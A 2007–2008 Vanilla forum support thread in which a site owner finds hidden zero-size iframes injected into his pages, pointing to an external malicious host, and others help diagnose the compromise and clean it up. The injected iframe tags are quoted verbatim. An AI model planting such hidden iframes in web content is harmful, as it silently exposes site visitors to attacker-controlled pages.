Blog Documentation Book a Demo
Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.

Forum Hack???

rescueracingrescueracing
edited January 2008 in Vanilla 1.0 Help
Hi Team, Hope you can help. I noticed in my forum that the "Add your comments" form was starting to show at the top of the first topic comment, which effectively covered over half of the first comment so you cant read the full comment. I dont know how this happened and i cant get rid of it. I am running Vanilla 1.1.4 and everything seems up to date. When i view the page source, the following appears at the top of the source page. Has my site been hacked and how do i get rid of it??? <iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe> <iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe> <iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe> <iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe> <iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe> <iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe> <iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe> <iframe src="http://checkengine.org.ua/forum/images/avatars/gallery1/index.php" width=0 height=0 border=0></iframe> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">

Comments

  • rescueracingrescueracing
    If you want to view the forum, you can view it at www.forum.rescueracing.asn.au I have just enabled non-members to view the forum
  • WandererWanderer
    Don't know who or what put those iFrames there but the content is very unsavoury!
    I'd be looking at the code in one of your add-ons?

    Posted: Saturday, 29 December 2007 at 10:11AM

  • DinoboffDinoboff
    edited December 2007
    It might have been added in more than one of the vanilla files - that's why it the iframe is added more than one time.

    You should upload the vanilla files on top of the corrupted one, upload your add-ons and check the files in the /conf/ folder.

    Finally you should contact your provider to know how it happens. Let us know if Vanilla or an add-on is vulnerable.
  • DinoboffDinoboff
    Regarding the title...

    Your server has been hacked. Most likely, someone manages to execute a script on your server (after have uploaded it?), to add the iframe tag to every index.* or default.* files.

    As far as I know, there is no such vulnerability published so I doubt the vulnerability used is in vanilla or one of its add-ons but it is possible.
  • rescueracingrescueracing
    So what you are saying is that it is a problem that i should take up with my web hosting company?? Thanks for the advice mate
  • VazVaz New
    Unconventional tips from me: - Consider disabling html input all together and instead enabling BBCode. - Try and edit that users post. If unable to via the normal interface, go into the database and manually remove the html code. The post will be somewhere in the (LUM_Comment) table.
  • DinoboffDinoboff
    edited December 2007
    @Vaz: It is not this kind of xss. The files have been corrupted (I guess). If anything is to disable, it will be anything that allow someone else than you to upload files on your server. You should also change your passwords like your ftp password.
  • keith_keith_
    did you follow all vanilla installation instructions regarding chmod folders and files and putting the .htaccess files? are other files outside the vanilla folder corrupted to? this whole php thing itself is a permanent risk if your php installation is not up to date, the php.ini is not well configured and chmod careless set.
  • rescueracingrescueracing
    as far as im aware i followed all the instructions but im not sure... is this sort of code dangerous to my site?
  • rescueracingrescueracing
    I have deleted all the extensions i had installed because i thought that might be where the problem was. It didnt seem to work but i am doing this a bit blind as im not sure exactly what to do. How do i get rid of these warning messages? Warning: include(/home/rescuera/public_html/forum/extensions/Notify/default.php) [function.include]: failed to open stream: No such file or directory in /home/rescuera/public_html/forum/conf/extensions.php on line 6 Warning: include() [function.include]: Failed opening '/home/rescuera/public_html/forum/extensions/Notify/default.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/rescuera/public_html/forum/conf/extensions.php on line 6 Warning: include(/home/rescuera/public_html/forum/extensions/Attachments/default.php) [function.include]: failed to open stream: No such file or directory in /home/rescuera/public_html/forum/conf/extensions.php on line 7 Warning: include() [function.include]: Failed opening '/home/rescuera/public_html/forum/extensions/Attachments/default.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/rescuera/public_html/forum/conf/extensions.php on line 7 Warning: include(/home/rescuera/public_html/forum/extensions/PrivateMessages/default.php) [function.include]: failed to open stream: No such file or directory in /home/rescuera/public_html/forum/conf/extensions.php on line 8 Warning: include() [function.include]: Failed opening '/home/rescuera/public_html/forum/extensions/PrivateMessages/default.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/rescuera/public_html/forum/conf/extensions.php on line 8 Warning: include(/home/rescuera/public_html/forum/extensions/AccountPictures/default.php) [function.include]: failed to open stream: No such file or directory in /home/rescuera/public_html/forum/conf/extensions.php on line 9 Warning: include() [function.include]: Failed opening '/home/rescuera/public_html/forum/extensions/AccountPictures/default.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/rescuera/public_html/forum/conf/extensions.php on line 9 Warning: include(/home/rescuera/public_html/forum/extensions/Poll/default.php) [function.include]: failed to open stream: No such file or directory in /home/rescuera/public_html/forum/conf/extensions.php on line 10 Warning: include() [function.include]: Failed opening '/home/rescuera/public_html/forum/extensions/Poll/default.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/rescuera/public_html/forum/conf/extensions.php on line 10 Warning: include(/home/rescuera/public_html/forum/extensions/CommentRemoval/default.php) [function.include]: failed to open stream: No such file or directory in /home/rescuera/public_html/forum/conf/extensions.php on line 11 Warning: include() [function.include]: Failed opening '/home/rescuera/public_html/forum/extensions/CommentRemoval/default.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/rescuera/public_html/forum/conf/extensions.php on line 11
  • WallPhoneWallPhone
    edited January 2008
    Yah, this is not good--it's also dangerous to your users. Here is a topic from someone else who had the same thing happen: http://perfectdarkelite.yuku.com/topic/1878/t/Re-NGC-Site-Messed-Up.html?page=-1 All those errors can be cleaned up by deleting all the lines that start with include in the conf/extension.php file. (It should still have the <?php tag at the top and lines that start with //) That will stop Vanilla from looking for them. It does appear one of them could have been the source of the issue... edit(since the iframes stopped appearing once they were deleted)
This discussion has been closed.